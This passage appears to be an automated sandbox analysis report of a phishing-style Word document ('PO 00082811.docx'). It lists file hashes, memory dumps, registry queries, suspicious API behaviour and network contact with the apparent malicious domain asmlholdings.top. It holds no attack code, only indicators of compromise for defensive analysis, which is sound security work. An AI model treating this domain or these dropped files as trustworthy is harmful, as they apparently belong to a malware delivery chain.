| SHA256 | b9a1bc4b475bba4c1308d4a984480450c7928fa93402d3b825bd5f81afa0fe67 |
| SHA512 | eb6399ee5c70d5e5da33442ab042b6a91f2d8facc35c0c11fd63b9ffcd981d2fa1f0f32f6ea60ea5fb4535030284ae2542d9e60f3e6398075196f6a3a64b9373 |
memory/904-220-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-219-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-227-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-228-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
| MD5 | 375a982b4b4ebb05d3509053d296ecf4 |
| SHA1 | 978efdb5c3760c6bd3b8383b7aacb58b4f23de79 |
| SHA256 | 624e96f15a561e2b6f89e202562686096510c15d57f6a41f40d645cf2cf7fea3 |
| SHA512 | f945bca4e2061cc9fcf5cf788ea9ba53dc6bbe0a03f6edc3576e0d85c7abea09ba19888e24548eec94ad781371adda2210e0c4003a0bf61ebdde6e635ff36198 |
memory/2976-251-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2976-252-0x000000007124D000-0x0000000071258000-memory.dmp
memory/904-260-0x0000000000400000-0x0000000000482000-memory.dmp
memory/904-259-0x0000000000400000-0x0000000000482000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-09 09:09
Reported
2024-08-09 09:12
Platform
win10v2004-20240802-en
Max time kernel
101s
Max time network
109s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeAuditPrivilege | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PO 00082811.docx" /o ""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | asmlholdings.top | udp |
| US | 172.67.139.221:443 | asmlholdings.top | tcp |
| US | 172.67.139.221:443 | asmlholdings.top | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 142.250.179.131:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 221.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 172.67.139.221:443 | asmlholdings.top | tcp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.16.167.138:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 138.167.16.2.in-addr.arpa | udp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| GB | 173.222.211.24:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 24.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/2380-0-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-3-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-2-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-1-0x00007FFE1682D000-0x00007FFE1682E000-memory.dmp
memory/2380-4-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-6-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-5-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-7-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-10-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-12-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-13-0x00007FFDD47B0000-0x00007FFDD47C0000-memory.dmp
memory/2380-14-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-15-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-16-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-9-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-18-0x00007FFDD47B0000-0x00007FFDD47C0000-memory.dmp
memory/2380-17-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-8-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-11-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IFM58U6K\eWjsdnqwKllAbeP[1].doc
| MD5 | f7e4812fd83625cdfe19159f6d2fefa9 |
| SHA1 | 15a20c40783e01f60135619b8358d1f1df0beb14 |
| SHA256 | fa22ac754b94cc3093cad88b03f0d2b1aa4b4c52a494c7a0b1db761acffbb5e7 |
| SHA512 | 51bfab21f0d18c4c7bcdfff776cb771949bdf29f43dab37767fb6d7cc64bb8996d730b39aa949b5f12d991dcd1e7cbbd953301581877bf165fd03c5ed33ef23d |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | e47017d2b78537263e5431b0b627bda4 |
| SHA1 | 0dcff64f35b70fdf4352837eec0600bd14b8ce24 |
| SHA256 | 40828054e5a965fa3fe7a16cb5d702b4b8dfc9ea551aa06fd5cab8902041f6b6 |
| SHA512 | 249c2c157ccad274f07b6a060402a83e6aa72e743600e7801ca75a9acac81ad055875385b3932f417922705708917cc56d91341c7c2240fcfc2247bb6e951b13 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
memory/2380-86-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-87-0x00007FFE1682D000-0x00007FFE1682E000-memory.dmp
memory/2380-88-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-92-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-91-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-90-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-95-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-94-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-93-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-96-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-89-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
memory/2380-97-0x00007FFE16790000-0x00007FFE16985000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TCD10A6.tmp\iso690.xsl
| MD5 | ff0e07eff1333cdf9fc2523d323dd654 |
| SHA1 | 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4 |
| SHA256 | 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5 |
| SHA512 | b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d |
memory/2380-601-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-602-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-604-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-603-0x00007FFDD6810000-0x00007FFDD6820000-memory.dmp
memory/2380-605-0x00007FFE16790000-0x00007FFE16985000-memory.dmp